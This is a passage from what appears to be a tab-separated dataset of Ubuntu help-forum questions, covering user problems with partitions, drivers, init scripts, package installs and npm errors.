to set it to 1 for checking the partition during the next boot . but after sudo rm /var/lib/update-notifier/fsck-at-reboot and a restart i have only got a response : ~ $ tune2fs -l /dev/sda6 tune2fs 1.42 ( 29-nov-2011 ) tune2fs : permission denied while trying to open /dev/sda6 could n't find valid filesystem superblock . can i use sudo tune2fs -l /dev/sda6 safely ? thanks .
353738	how do i install ubuntu 12 with a usb wifi adapter ?	i tried to install ubuntu 12 on a windows xp laptop that makes use of a wifi usb adapter , but at the beginning of the installation ubuntu says , that it can not get some software from the net . what to do ?
353739	i wish to wipe my computer and back up files as someone has remote access to my laptop and then reinstall ubuntu	can someone please tell me how i can back up my files and successfully wipe my computer then reinstall ubuntu as someone has remote access to my laptop
353747	ubuntu 12.10 ( 32bit ) system heatup	i 'm using hp envy 4 intel i5 3rd gen , 4gb ram , 2gb ati raedon 7670m graphics card . freshly installed ubuntu 12.10 ( 32bit ) in my laptop used to turn off within 20 minutes due to overheating . i followed up similar posts and installed an amd graphics driver . what is the correct way to install ati catalyst video drivers ( fglrx ) ? after following the above post i my system would turn off less often due to overheating , but whenever my system heated up , which it did roughly after half an hour , all my programs gets hanged . what do i do ? ?
353748	usb audio card fails to initialize after turning it off and on again	i have a problem with an `` e-mu tracker pre '' usb audio card and kubuntu . when i start the audio card for the first time since boot everything works fine , but after turning it off and on again , regardless of the delay between restarting it , there 's a 90 % chance it will fail to boot up . all the lights are lit up and stay like that , which is its loading sequence and should turn off in a second , but they stay frozen like that . i can see the card in my /dev but if i try to open the sound manager or echo/cat some data directly to the card the window freezes until i turn off the card . there is a chance that the card will be recognized properly if i repeatedly turn it on and off , and it has happened once in a blue moon , but i have n't thoroughly tested it as i do not want to burn it . moving the ac to another usb port does not help and i can confirm that the problem did not exist in ubuntu 11.x/12.x the problem is gone after reboot for one launch of the ac and then reappears again . as it significantly hurts my creative flow i can not settle for this as a 'solution ' . up-to date kubuntu 13.04 dmesg log
353749	alternative to superswitcher ? ( alt-tab replacement )	i am looking for an alternative to superswitcher that has the following features : -order windows in a consistent manner ( e.g . by alphabet ; not by most recently used ) -optional : search window names unfortunately , superswitcher has been a dead project since 2007 and i 'm too scared to install the deb package because it might ruin my ubuntu installation . question is similar to how to stop reordering of the same kind multiple preview windows in task switching ? edit : i tried to install superswitcher and nothing happened .
353750	how to dbkg-preconfigure login manager	i 've written a script that installs several desktops with a menu loop . i have also redirecteed the output to /dev/null , now every time when it comes to dpk login manager selection the script does n't continue . what could i du to preconfigure the login mangager that should be choosen . how do the lines for dpkg preconfigure look for lightdm gdm kdm mdm debconf-set-selections < < < ' ' would be grate , too . thank you folks !
353755	password change helllppp	i ca n't modify my password , but i have nothing set . i have gdebi ( no pass asking ) . who can help me ? ? please ... i have ubuntu 12.04 hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
353758	package operation failed : the installation or removal of software package failed	i could not install and uninstall software in usc.this issue got started after i updated my 13.04 ( rr ) error detail : installarchives ( ) failed : setting up install-info ( 4.13a.dfsg.1-10ubuntu4 ) ... /etc/environment : line 1 : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/prabhu/study/lib/jdk-7u21-linux-x64/usr/java/**jdk1.7.0_21/bin/ : : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : install-info setting up install-info ( 4.13a.dfsg.1-10ubuntu4 ) ... /etc/environment : line 1 : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/prabhu/study/lib/jdk-7u21-linux-x64/usr/java/jdk1.7.0_21/bin/ : : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1
353760	does `` snapshot '' command exist like in linux redhat ?	i used to use `` snapshot '' command to capture screen shots in the linux redhat environment . is there the same or similar command with ubuntu 12.04 lts ?
353765	check whether /boot is a separate particion	i do n't understand , how do i have a separate /boot partition or not ? alex @ me : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000a1bc4 device boot start end blocks id system /dev/sda1 * 2048 1506224127 753111040 83 linux /dev/sda2 1946028030 1953523711 3747841 5 extended partition 2 does not start on physical sector boundary . /dev/sda3 1506224128 1946025983 219900928 7 hpfs/ntfs/exfat /dev/sda5 1946028032 1953523711 3747840 82 linux swap / solaris partition table entries are not in disk order alex @ me : ~ $ sudo df -h filesystem size used avail use % mounted on /dev/sda1 707g 273g 399g 41 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.8g 12k 1.8g 1 % /dev tmpfs 353m 908k 352m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.8g 760k 1.8g 1 % /run/shm none 100m 28k 100m 1 % /run/user
353766	how can i use ubuntu 12.04 server to play a repeating video loop on a connected tv ?	i would like to use ubuntu server 12.04 to play a repeating video loop on a connected tv . there wo n't be any interaction with the system once it is live , except remotely . additionally , i need to be able to push an updated video file/files to the server remotely and have them play as soon as they are done . i 'm not worried about the technology required to send the files to the server as i can handle that , but i would like to know which video player for ubuntu server to use and how to set up the server to play video . so the ideal setup would be we just connect this server to a tv , turn it on , and then it begins playing the video loop . thanks .
353772	installing ubuntu 12.04.03	i 'm trying to install ubuntu on my desktop and am getting the message : `` no root file system is defined '' on the menu for installation type . i ca n't seem to find what to do next .
353778	how to use ssh to transfer files from computer a to local computer	i am trying to get some files off of my school linux account using ssh . i have got the connection to work using : scp < school_server > : ~/folder i want ~/where i want to go . but when it goes to transfer folder it gives me the message : not a regular file the file contains .java files , and i want the whole folder . linux newb here so any help would be appreciated . thanks
353781	autostarting couchpotato with ubuntu 13.04	hi i have a problem autostarting couchpotato 2 in ubuntu i did this : sudo cp /home/max/.couchpotato/init/ubuntu /etc/init.d/couchpotato sudo nano /etc/init.d/couchpotato my file looks like this : # ! /bin/sh # # # begin init info # provides : couchpotato # required-start : $ local_fs $ network $ remote_fs # required-stop : $ local_fs $ network $ remote_fs # should-start : $ networkmanager # should-stop : $ networkmanager # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : starts instance of couchpotato # description : starts instance of couchpotato using start-stop-daemon # # # end init info # check for existance of defaults file # and utilze if available if [ -f /etc/default/couchpotato ] ; then . /etc/default/couchpotato else echo `` /etc/default/couchpotato not found using default settings . `` ; fi # script name name=couchpotato # app name desc=couchpotato # # do n't edit this file # # edit user configuation in /etc/default/couchpotato to change # # # # cp_user= # $ run_as , username to run couchpotato under , the default is couchpotato # # cp_home= # $ app_path , the location of couchpotato.py , the default is /opt/couchpotato # # cp_data= # $ data_dir , the location of couchpotato.db , cache , logs , the default is /var/couchpotato # # cp_pidfile= # $ pid_file , the location of couchpotato.pid , the default is /var/run/couchpotato.pid # # python_bin= # $ daemon , the location of the python binary , the default is /usr/bin/python # # cp_opts= # $ extra_daemon_opts , extra cli option for couchpotato , i.e. `` -- config_file=/home/couchpotato/couchpotato.ini '' # # ssd_opts= # $ extra_ssd_opts , extra start-stop-daemon option like `` -- group=users '' # # # # example if want to run as different user # # add cp_user=username to /etc/default/couchpotato # # otherwise default couchpotato is used # run cp as username run_as=max # path to app # cp_home=path_to_app_couchpotato.py app_path=/home/max/.couchpotato/ # data directory where couchpotato.db , cache and logs are stored data_dir= $ { cp_data-/var/couchpotato } # path to store pid file pid_file= $ { cp_pidfile-/var/run/couchpotato.pid } # path to python bin daemon=/usr/bin/python # extra daemon option like : cp_opts= '' -- config=/home/couchpotato/couchpotato.ini '' extra_daemon_opts= $ { cp_opts- } # extra start-stop-daemon option like start_opts= '' -- group=users '' extra_ssd_opts= $ { ssd_opts- } pid_path=/var/run/couchpotato/server.pid daemon_opts= '' couchpotato.py -- daemon -- pid_file= $ { pid_file } -- data_dir=/home/max/.couchpotato '' test -x $ daemon || exit 0 set -e # create pid directory if not exist and ensure the couchpotato user can write to it if [ ! -d $ pid_path ] ; then mkdir -p $ pid_path chown $ run_as $ pid_path fi if [ ! -d $ data_dir ] ; then mkdir -p $ data_dir chown $ run_as $ data_dir fi if [ -e $ pid_file ] ; then pid=`cat $ pid_file` if ! kill -0 $ pid > /dev/null 2 > & 1 ; then echo `` removing stale $ pid_file '' rm $ pid_file fi fi case `` $ 1 '' in start ) echo `` starting $ desc '' start-stop-daemon -d $ app_path -c $ run_as $ extra_ssd_opts -- start -- pidfile $ pid_file -- exec $ daemon -- $ daemon_opts ; ; stop ) echo `` stopping $ desc '' start-stop-daemon -- stop -- pidfile $ pid_file -- retry 15 ; ; restart|force-reload ) echo `` restarting $ desc '' start-stop-daemon -- stop -- pidfile $ pid_file -- retry 15 start-stop-daemon -d $ app_path -c $ run_as $ extra_ssd_opts -- start -- pidfile $ pid_file -- exec $ daemon -- $ daemon_opts ; ; status ) status_of_proc -p $ pid_file `` $ daemon '' `` $ name '' ; ; * ) n=/etc/init.d/ $ name echo `` usage : $ n { start|stop|restart|force-reload|status } '' > & 2 exit 1 ; ; esac exit 0 i saved and did this : sudo chmod +x /etc/init.d/couchpotato sudo update-rc.d couchpotato defaults but when i now reboot couchpotato doesnt start : (
353787	does `apt-get install` install dependencies of dependencies ?	does apt-get install install dependencies of dependencies ? for example , considering package clamsmtp , among other dependencies it needs clamav-daemon , and clamav-daemon , among other dependencies , needs clamav-base and clamav-freshclam , etc . so , if i use : sudo apt-get install clamsmtp will it automatically install the needed dependencies and those dependencies ' dependencies , and so on , until all dependencies are met ?
353788	13.04 : kernel panic - not syncing : no init found	i know this question has been asked several times on this forum , but none of the answers given worked for me . tonight i did an install of ubuntu 13.04 on a brand new acer aspire laptop . i formatted the complete harddisk , removing the existing windows 8 partitions . installation had no problems . after rebooting the system hangs and says : `` kernel panic - not syncing : no init found . try passing init= option to kernel '' . i am able to boot the liveusb . what i have tried complete re-install of the system . same error appears started liveusb , mounted filesystem , restarted . same error . started liveusb , tried sudo fsck /dev/sdb1 , mounted filesystem , restarted . same error . i am quite new to ubuntu , what next steps can i take ? how can i pass init= option to the kernel ? thank you very much in advance !
353792	incomplete file transfers to usb drive with nautilus	sometimes when i copy or move some files to my usb drive nautilus says the transfer is completed but when i unplug the usb drive and plug it back in again the file that i copied or moved is not there . this is very annoying . is there any way to fix this ?
353795	asus zenbook ux51vz 2.1 audio mode	i recently purchased an asus zenbook ux51vz and installed kubuntu 13.04 x64 ( all defaults still ) on it and most things seem to work fine , with just a few exceptions . adding options snd-hda-intel model=asus-mode4 to /etc/modprobe.d/alsa-base.conf as suggested in this post has enabled additional audio options , but a 2.1 profile is not among them . the external subwoofer appears to be on the back right channel in a 4.0 surround sound setup - how do i create a 2.1 profile that correctly maps that channel to the subwoofer ?
353803	ubuntu wo n't recognize dvd drive	i just installed ubuntu 13.04 on my hp pavilion dv2000 and it wo n't recognize my dvd drive . i know very little about computers . can anybody walk me through figuring this out ? i originally installed ubuntu 12.04 with the dvd drive . i 'm not sure if it recognized the drive after installation but it did n't work after i upgraded to 13.04 . i reinstalled 13.04 to see if that would fix it and it did n't . any other ideas ?
353805	sudo : grub-setup : command not found	i 'm installing windows along with ubuntu 13 . at some point i have to say : sudo apt-get update & & sudo apt-get install grub-pc sudo grub-setup /dev/sda # note that there is no digit sudo umount /boot however , the second line says that sudo : grub-setup : command not found , although the previous one said grub-pc is already the newest version . man grub-setup is working well .
353808	monitor layout changed after suspend	i use ubuntu 13.04 with nvidia driver 304.88 . i have a dual screen config : external monitor on the left and laptop on the right . however when the computer wakes up after suspend , the monitor layout is swapped ( external on the right and laptop on the left ) . i 've tried to change is in nvidia-settings and save it to xorg.conf . i also created a xrandr script and put it in /etc/pm/sleep.d . none of the worked . any ideas ? ( sorry for not adding more details , but it 's strange and i do n't know what could be relevant ) .
353811	ubuntu 13.04 did n't mount usb memory	i have installed 13.04 and after installation i had some problems with usb-sd card converter that worked fine before installation . the dmesg after inserting the usb-sd card adapter with a sd card on it ( i tried with 4 cards that used to work fine on other computer ) [ 12081.900613 ] usb 3-1 : usb disconnect , device number 12 [ 12086.362640 ] usb 3-3 : new high-speed usb device number 13 using xhci_hcd [ 12086.389609 ] usb 3-3 : new usb device found , idvendor=090c , idproduct=6200 [ 12086.389617 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 12086.389621 ] usb 3-3 : product : generic usb2.0 card [ 12086.389624 ] usb 3-3 : manufacturer : silicon motion , inc. [ 12086.389627 ] usb 3-3 : serialnumber : 12345678901234567890 [ 12086.389882 ] usb 3-3 : ep 0x81 - rounding interval to 128 microframes , ep desc says 255 microframes [ 12086.389892 ] usb 3-3 : ep 0x2 - rounding interval to 128 microframes , ep desc says 255 microframes but i could not see any device in /mnt . i did n't have idea what might goings wrong .
353812	does ubuntu touch support docking ?	are the features of ubuntu for android included in ubuntu touch ? like going into a full desktop ? i 'm a bit confused .
353814	maas out of sync with lshw	i created a maas tag with $ maas-cli maas tags new name='5-disks ' comment='a machine that has at least 5 hard disks ' definition='count ( //node [ starts-with ( @ id , '' disk '' ) and @ class= '' disk '' ] ) > = 5' but at least one node does not get tagged . $ sudo lshw -xml > /tmp/lshw.xml $ xmlstarlet sel -t -t -v 'count ( //node [ starts-with ( @ id , '' disk '' ) and @ class= '' disk '' ] ) > = 5 ' /tmp/lshw.xml true it looks like maas is out of sync with lshw output . maas server is running ubuntu 13.04 , one of the nodes that work is 12.04.3 and one of the nodes that does n't is 12.04.2 . re'deploying or re-provisioning may not be an option at this point , so i am not sure how to debug it .
353819	how to force ubuntuone android app to create u1 folder on external sd card	my android phone has only 2 gb of internal storage and i 've upgraded it with 8 gb external sd card . buy when i ran ubuntu one sync app , the syncing master directory `` u1 '' was created on top of the main -but small- storage device . so , the question is how to force the app to sync within the external storage device . i 've seen a somehow related question , but it is still not solved . tia
353822	how can i resize my ubuntu partition if ubuntu is the only system i can get into ?	i am using gparted to resize my partition . i would like to free up all of my memory and allocate this to ubuntu , but i ca n't mess with ubuntu 's partition while it is in use . i can , for some reason , no longer get into my windows 8 os because of an efi error . i just installed ubuntu 13.04 so would it be easier to just re-install and have ubuntu install over everything else , or is there a way with gparted ?
353827	running multiple services on one dedicated server with static ip	since some time i am tinkering with a dedicated server running on ubuntu . the basic setup lamp , ssh is no problem , works great . but when i install multiple applications as a service i get stuck in getting access to those . for example a website is on port 80 , airtime is on port 8000 , ftp 20/21 and so on . i ran in to problems by installing rutorrent for example ( following this tutorial ) . it has its own folder and virtual host set up in apache i.e . /var/www/rutorrent and with it 's own port 9090 . no matter what i try , ca n't reach its own index.html . i also forward the ports and ip on my router , no firewall for the moment . my understanding of running multiple applications on one server is that as long each app has it 's own port , you can run them side by side : 192.168.1.101:21 ftp 192.168.1.101:80 website 192.168.1.101:8000 airtime 192.168.1.101:9090 rutorrent and so on.. am i right in populating my server this way ?
353828	will ubuntu erase all my harddisks upon installation	i have 2 harddrives , 2 ssd 's stripped and 1 hdd ( got it configurerd with windows when i bought this laptop ) . i want to install my ubuntu on my ssd 's raid where currently windows is installed . but when i click `` erase '' in the ubuntu installer and select the ssd 's raid volume , will it also erase my other hdd ? because i have saved all my important files on this hdd , so it must not got erased.. i 'm 99 % sure it does n't , but because of the important files i must know it for sure .
353830	i have a patch for my laptop that needs to be added but i have no idea how to apply it	this is a link to the bug and people say it has been patched but i do n't know how to apply the patch . https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/529477 the bug is on the hp dv6 pavilion laptops and it says the bios needs to be updated before suspend mode will work .
353834	know how to change boot order , have ubuntu 13.04 on a bootable usb stick , but wo n't load	as the title says , i have a bootable usb drive , and ubuntu 13.04 is installed on it , but when i change the the first boot device to the usb , it does n't load and goes to windows . can you help ?
353835	i can not use non-letters keys ( czech layout ) in any application	since i installed ubuntu ( 13.04 ; before that i was using windows ) i have n't been able to use non-letters keys ( such as 123 [ ] ; /. , ) in any application . when i was installing ubuntu i chose czech layout , but when i switch to us layout it makes no different . i have tried external keyboard ( i 'm using lenovo thinkpad e430 ) , but it does n't work either . can someone help me please ?
353838	no sound out of headphone jack in 13.04	i installed ubuntu 13.04 today , finally overriding the windows 8 secure boot after 3 days of trying . the only issue i am currently having is that there is sound coming from my speakers , but when i plug my headphones in the headphone jack , there is no sound . what should i do ? thanks
353841	wifi enabled printer configuration	i have a wifi capable printer and a desktop computer . i currently use the ethernet connection to my router for printing from the computer but i also wish to be able to print from my ipad/iphone to the same printer . is this possible ?
353844	added keyboard layouts are not applied	i have installed ubuntu 12.04.3 on my laptop , dell xps l702x . i added swedish keyboard layout from system settings > keyboard layouts , ticked alt+shift in options , and then i restarted the computer . the language indicator does n't show up , and the layout of the keyboard is not changed by hitting alt+shift . my laptops specialized keys ( fn+some function key ) are not functioning .
353847	apache permissions	i have changed my documentroot to ~/www . the permissions of it are 0774 . i have added the www-data user to my user 's group and the owner of ~/www is my own user and group ( user : user ) . the problem is that apache ca n't write to this directory . it can write only if i set www-data as owner , but if i do that , i ca n't write at the directory . the opposite thing applies too . this is more like a linux question , not ubuntu but i really hope that you can help me . thanks !
353849	can not get scalpel right	trying out scalpel 1.60 and 2.0 on ubuntu 12.04 but i am not 100 % sure that it 's working the way i expecting . here is the scenario . creating and deleting a jpg-file on /dev/sda1 . instructed scalpel.conf to only recover *.jpg files . running this line : sudo scalpel -c scalpel.conf -o myoutputfolder /dev/sda1 to access myoutputfolder i run this : sudo chmod -r 777 myoutputfolder the files in myoutputfolders are all numbered like but i ca n't seem to find my deleted file . i have tested this on several computers to no avail . so i am starting to think that i am missing something ... but what ? any ideas ? i am a newbie so be kind ; - )
353853	how to update coffee script ?	i got a following error when i tried to watch coffee scripts by coffee -o js -cw coffee . /usr/local/lib/node_modules/coffee-script/lib/coffee-script/command.js:321 throw e ; ^ error : watch unknown system errno 28 at errnoexception ( fs.js:636:11 ) at fswatcher.start ( fs.js:663:11 ) at object.watch ( fs.js:691:11 ) at /usr/local/lib/node_modules/coffee-script/lib/coffee-script/command.js:287:27 at object.oncomplete ( /usr/local/lib/node_modules/coffee-script/lib/coffee-script/command.js:100:11 ) i have no idea what is going with error . then i checked the versions , coffee -v is 1.6.1 and node -v is v0.6.12 . according the official site ( http : //coffeescript.org/ ) the latest version is 1.6.3 , so i wanted update coffee by npm update -g coffee-script , but this fails also . npm warn coffee-script @ 1.6.1 package.json : bugs [ 'name ' ] should probably be bugs [ 'url ' ] npm http get https : //registry.npmjs.org/coffee-script npm http 304 https : //registry.npmjs.org/coffee-script how can i update coffee script ? edit 2013/10/11 in my coffee script directory there is only one file box_wrapper.coffee . $ - > $ ( `` body '' ) .children ( ) .wrap - > `` < div id= ' # { $ ( @ ) .attr `` id '' } _box ' class='wrapper'/ > '' edit 2013/10/16 i tried to re-install coffee , so i 've done like this . $ sudo npm -g rm coffee npm warn not installed in /usr/local/lib/node_modules coffee $ coffee -v coffeescript version 1.6.1 i ca n't remove coffee . and i tried also like this . $ sudo apt-get remove npm $ npm -v -bash : /usr/bin/npm : no such file or directory $ sudo apt-get install npm $ npm -v 1.1.4 $ sudo npm -g install coffee # i omit a lot of `get` parts . npm http 304 https : //registry.npmjs.org/mkdirp/0.3.4 npm err ! error installing express @ 3.2.6 npm http 304 https : //registry.npmjs.org/assertion-error/1.0.0 npm http 304 https : //registry.npmjs.org/growl npm http 304 https : //registry.npmjs.org/jade/0.26.3 npm http 304 https : //registry.npmjs.org/diff/1.0.2 npm http 304 https : //registry.npmjs.org/mkdirp/0.3.5 npm http 304 https : //registry.npmjs.org/glob/3.2.1 npm http 304 https : //registry.npmjs.org/ms/0.3.0 npm err ! error rolling back express @ 3.2.6 error : unknown , unknown error '/usr/local/lib/node_modules/coffee/node_modules/express' npm err ! error installing coffee @ 0.0.1 npm err ! eexist , file already exists '/usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules' npm err ! file exists : /usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules npm err ! move it away , and try again . npm err ! npm err ! system linux 3.2.0-54-generic-pae npm err ! command `` node '' `` /usr/bin/npm '' `` -g '' `` install '' `` coffee '' npm err ! cwd /home/ironsand npm err ! node -v v0.6.12 npm err ! npm -v 1.1.4 npm err ! path /usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules npm err ! fstream_path /usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules/___debug.npm npm err ! fstream_type directory npm err ! fstream_class dirwriter npm err ! code eexist npm err ! message eexist , file already exists '/usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules' npm err ! errno { } npm err ! fstream_stack /usr/lib/nodejs/fstream/lib/writer.js:161:23 npm err ! fstream_stack object.oncomplete ( /usr/lib/nodejs/mkdirp.js:34:53 ) npm err ! eexist , file already exists '/usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules' npm err ! file exists : /usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules npm err ! move it away , and try again . npm err ! npm err ! system linux 3.2.0-54-generic-pae npm err ! command `` node '' `` /usr/bin/npm '' `` -g '' `` install '' `` coffee '' npm err ! cwd /home/ironsand npm err ! node -v v0.6.12 npm err ! npm -v 1.1.4 npm err ! path /usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules npm err ! fstream_path /usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules/___debug.npm npm err ! fstream_type directory npm err ! fstream_class dirwriter npm err ! code eexist npm err ! message eexist , file already exists '/usr/local/lib/node_modules/coffee/node_modules/mocha/node_modules' npm err ! errno { } npm err ! fstream_stack /usr/lib/nodejs/fstream/lib/writer.js:161:23 npm err ! fstream_stack object.oncomplete ( /usr/lib/nodejs/mkdirp.js:34:53 ) npm err ! npm err ! additional logging details can be found in : npm err ! /home/ironsand/npm-debug.log npm not ok and npm-debug.log is a blank file .
353856	enable synaptics touchpad 2 finger zooming	i 'm using ubuntu 13.04 for some time now and after customization there is but one feature i 'm missing : the 2 finger zoom function ( pinch zoom function ) where you place 2 fingers on the touchpad and move them apart from each other or together to zoom in or out . all other functions are superior to the windows counterpart so i do n't want the all synaptics software ( which will disable many of the improvements made by the awesome opensource programmers which i use quite often ( like for example the 2 finger tap for the right mouse button ) ) i know i can hold the ctrl button and scroll to achieve the same end but for productivity reasons i would like to activate the pinch zoom function . is there anyway to add the pinch and zoom function to the gestures already present ?
353857	how do i install a printer on ubuntu server 12 ?	i have ubuntu server 12 and i 've installed samba and cups . i have also downloaded and installed the drivers for my printer . at this point , i 'm unsure of how to actually go about and install and configure the printer . the printer is a canon ip3600 , which does n't have support per se , but there were third-party drivers which i unpacked , modified according to the instructions , and installed . i have the printer plugged into the server via a usb . after googling i still have n't found instructions on installing the printer itself , though i have found plenty on configuring samba and cups . how do i go about the actual installation and configuration of the printer itself ? thanks !
353867	wildcards in gedit	is there a way to use wildcards in gedit 's search and replace function ? i really do n't want to have to install anything or try or have to figure out how to use a 3rd party pluginâi installed the advanced find and replace plugin , yet there is absolutely zero information on how to use the thing .
353874	first ubuntu touch devices	as ubuntu touch will be shortly release , october 17 , i 'm aksing what will be the first devices release with it and when ? i have to change my phone soon and i absolutely want a phone with ubuntu . if the first devices would be release much later , then i will buy an android phone and install ubuntu phone in dual-boot .
353876	how to get wubi 's boot helper to work in ubuntu	the only way i can get my computer to boot a linux disc is from the wubi boot helper and i need to downgrade to bodhi to work better with my laptop
353880	schedule task to close	i want to schedule transmission to close at a certain time every day in gnome schedule task . i figured out how to get transmission it open at 12:01am , but how do i make it close at 5:00am ?
353885	openjdk java 7 missing from `` open with '' under file properties	ok . i have read through probably two-dozen posts and articles , and still ca n't seem to find an answer . i have installed openjdk-7 and am trying to set it as the default to open .jar files ( specifically , i 'm trying to set it as the default for minecraft.jar , freshly downloaded from the minecraft.org site ) . i am running the 64-bit version of ubuntu 13.04 ( fresh install ) , and installed openjdk through the software center . everything looks to be fine , openjdk shows up in the /usr/share/applications directory . if i right-click on minecraft.jar i see `` openjdk java 7 runtime '' as an option under the `` open with '' context menu . that 's fine . it launches the minecraft launcher , checks for updates , and i can fire up the game . the problem is , if i go to `` properties '' and then to the `` open with '' tab , openjdk is nowhere to be found in the list of options . i want to set it up as the default for .jar files so i can set up a launcher to drop into the unity launcher . i have also used gedit in a terminal window to change the `` defaults.list '' file in the /applications directory to use openjdk-7-java.desktop for both jar and java-archive . no matter what i try , the outcome is always the same : i can launch it if i right-click > open with > openjdk ... but i can not set openjdk as the default for .jar files .
353887	flash drive issue	so i used startup disk creator on ubuntu 13.04 . what i was trying to burn did n't work , so it stopped . i see files on my flash drive from the installment , but i ca n't delete them or add any new files to my flash drive . any fix ? format via the startup disk creator just fails after attempt .
353890	how to enable laptop shortcut keys	i was wondering if there was any way to enable the shortcut keys built into my laptop . i have an older asus g1sn laptop that has shortcut keys built into the top of the keyboard for enabling/disabling the trackpad etc . i usually have a mouse with me , and would rather use that than the trackpad , which tends to get in the way . but i 'd like to know i can re-enable it if need be without using the mouse to navigate to where i can turn it back on in the system settings . thanks for any pointers !
353891	install gns got error	even if using apt-get update -- fix-missing , still got this error 2nd error is no response from gns source sudo apt-get install qt4-dev-tools reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libmysqlclient16 libphonon4 libqt4-declarative libqt4-designer libqt4-dev libqt4-help libqt4-opengl-dev libqt4-qt3support libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-mysql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xmlpatterns libqtwebkit-dev libqtwebkit4 mysql-common phonon phonon-backend-gstreamer qt4-designer qt4-doc qt4-qmake suggested packages : libmysqlclient-dev libsqlite0-dev libsqlite3-dev libpq-dev unixodbc-dev phonon-backend-xine phonon-backend-vlc phonon-backend-mplayer gstreamer0.10-plugins-ugly qt4-doc-html the following new packages will be installed : libmysqlclient16 libphonon4 libqt4-declarative libqt4-designer libqt4-dev libqt4-help libqt4-opengl-dev libqt4-qt3support libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-mysql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xmlpatterns libqtwebkit-dev libqtwebkit4 mysql-common phonon phonon-backend-gstreamer qt4-designer qt4-dev-tools qt4-doc qt4-qmake 0 upgraded , 25 newly installed , 0 to remove and 8 not upgraded . need to get 114 mb of archives . after this operation , 212 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! mysql-common libmysqlclient16 libphonon4 libqt4-script libqt4-sql libqt4-xmlpatterns libqt4-declarative libqt4-designer libqt4-qt3support libqt4-svg libqt4-scripttools libqt4-help libqt4-test qt4-qmake libqt4-dev libqt4-opengl-dev libqt4-sql-mysql libqt4-sql-sqlite phonon-backend-gstreamer phonon libqtwebkit4 libqtwebkit-dev qt4-designer qt4-dev-tools qt4-doc install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-common all 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ natty/main libphonon4 amd64 4:4.7.0really4.5.0-0ubuntu3 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ natty-updates/main phonon-backend-gstreamer amd64 4:4.7.0really4.5.0-0ubuntu2.1 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ natty/main phonon all 4:4.7.0really4.5.0-0ubuntu3 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-common all 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libmysqlclient16 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-script amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-sql amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-xmlpatterns amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-declarative amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-designer amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-qt3support amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-svg amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-scripttools amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-help amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ natty/main libqtwebkit4 amd64 2.1~really2.0.2-0ubuntu1 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ natty/main libqtwebkit-dev amd64 2.1~really2.0.2-0ubuntu1 404 not found [ ip : 